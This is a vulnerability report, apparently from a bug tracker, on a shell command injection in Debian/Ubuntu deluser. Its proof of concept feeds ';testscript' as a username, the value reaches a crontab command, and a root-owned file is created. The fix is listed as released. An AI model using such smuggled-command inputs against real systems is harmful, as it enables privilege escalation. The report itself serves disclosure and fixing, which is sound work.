adduser & deluser shell command injection
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
adduser (Debian) |
Fix Released
|
Unknown
|
|||
adduser (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.)
This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible.
-------------- Proof of concept ----------------
# ll /test-file
ls: cannot access '/test-file': No such file or directory
# cat /usr/bin/testscript
#!/bin/bash
touch /test-file
# deluser
Enter a user name to remove: ;testscript
no crontab for root
crontab: usage error: no arguments permitted after this option
usage: crontab [-u user] file
crontab [ -u user ] [ -i ] { -e | -l | -r }
-e (edit user's crontab)
-l (list user's crontab)
-r (delete user's crontab)
-i (prompt before deleting user's crontab)
/usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
(failed reverse-
# ll /test-file
-rw------- 1 root root 0 Jul 31 10:25 /test-file
-------- system description --------
Description: Ubuntu 18.04.2 LTS
Release: 18.04
# apt-cache policy adduser
adduser:
Installed: 3.116ubuntu1
Candidate: 3.116ubuntu1
Version table:
*** 3.116ubuntu1 500
500 http://
100 /var/lib/
Changed in adduser (Debian): | |
status: | Unknown → New |
Changed in adduser (Debian): | |
status: | New → Confirmed |
Changed in adduser (Debian): | |
status: | Confirmed → Fix Committed |
Changed in adduser (Debian): | |
status: | Fix Committed → Fix Released |
A similar bug was created in 2011 but got no attention. https:/ /bugs.launchpad .net/ubuntu/ +source/ adduser/ +bug/782170
It looks to me like the upstream version in Debian is also susceptible. Could you file a bug with Debian as well? https:/ /www.debian. org/Bugs/ Reporting